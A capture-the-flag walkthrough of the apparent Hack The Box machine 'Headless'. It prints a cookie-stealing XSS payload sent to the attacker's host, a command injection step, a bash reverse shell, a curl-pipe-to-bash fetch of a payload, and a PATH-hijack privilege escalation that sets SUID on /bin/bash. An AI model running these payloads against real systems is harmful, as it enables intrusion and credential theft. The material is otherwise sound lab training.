sudo nmap -Pn -sT -sU -sC -sV 10.10.11.242
I add headless to /etc/hosts
with the corresponding ip address given. Then navigate to http://headless.htb:5000
echo "10.10.11.8 headless.htb" | sudo tee -a /etc/hosts
dirsearch -u http://headless.htb:5000
We can see that there are two pages available; /support
and /dashboard
. Let’s visit both of them to find our way into the machine.
To access the /dashboard
, we either need to be logged in as a user with elevated privileges (admin) (but I don’t see a login page), or we need to trick the server into believing that we are authorized to access the URL. When considering how to trick the server, I think about providing it with either an admin cookie or an admin session ID.
We need to provide a payload that can capture the cookies of the admin user who will be reviewing our support queries. The payload will look like this:
<script>document.location='http://<Your_Kali_IP>/?cookie='+document.cookie</script>
Additionally, we can URL encode this payload by pressing Ctrl + u
. Along with this payload, we also need to start an HTTP server using the following command:
python3 -m http.server 80
At this stage, we need to test the XSS payload across all parameters present in the POST request, including message, email, User-Agent, and others. After testing, we’ll discover that the same payload must be inserted into two specific parameters: message and User-Agent.”
After waiting for a minute, we can see that we have received the admin user’s cookie. Now, we can add this cookie value to our browser using the inspect element feature or cookie editor add-on.
Navigate to http://headless.htb:5000/dashboard
to access the Administrator Dashboard. Here, you’ll encounter an option to generate the website’s health report for a specific date. Let’s intercept this request via Burp Suite and transfer another POST request to the repeater tool.
Within the body of this request, locate the date parameter. We’ll attempt to detect a command injection vulnerability using this parameter by employing the following payload:
&& pwd
Additionally, we can URL encode this payload by pressing Ctrl + u
. Now, let’s send the request and check the response, where we will find that the date parameter is vulnerable to command injection.
I make a file named payload.sh
with the following inside it.
/bin/bash -c 'exec bash -i >& /dev/tcp/10.10.16.18/4444 0>&1'
The IP address should be your IP address, and the port number /4444
represents the port on which I’m going to open my netcat listener.
nc -nlvp 4444
finally run the Python3 HTTP server to host the file (payload.sh) using the following command
python3 -m http.server 8081
We want to insert a command that will fetch the payload file we created and run it. Make sure that you have your admin cookie listed in the cookie field. (don’t forget ctrl + u
)
curl http://10.10.16.18:8081/payload.sh|bash
We can see that the payload.sh file is downloaded by the web server and then executed which results in getting a reverse shell on our netcat listener.
get user.txt
Now, let’s proceed to gain root access on the target machine. We’ll initiate by checking the sudo privileges using the following command:
sudo -l
Upon execution, it’s revealed that the dvir
user possesses permission to execute the /usr/bin/syschec
k binary as the root user. Let’s inspect the contents of this binary.
We’ll discover that there’s a bash script named initdb.sh
that is executed without specifying its full path. Exploiting this vulnerability is straightforward; we create a malicious bash script with the same name. Executing the following commands accomplishes this:
echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
Upon executing the syscheck
binary, our malicious script in the current directory takes precedence. This script assigns the SUID bit of the root user to the /bin/bash file. To witness this in action, we run the command:
sudo /usr/bin/syscheck
Following this command execution, we proceed to execute /bin/bash
with the owner’s (root) privileges using the command:
/bin/bash -p
After executing the above command, we’ll observe that we have successfully escalated our privileges to the root
user. Consequently, we can effortlessly access the contents of the root.txt
file.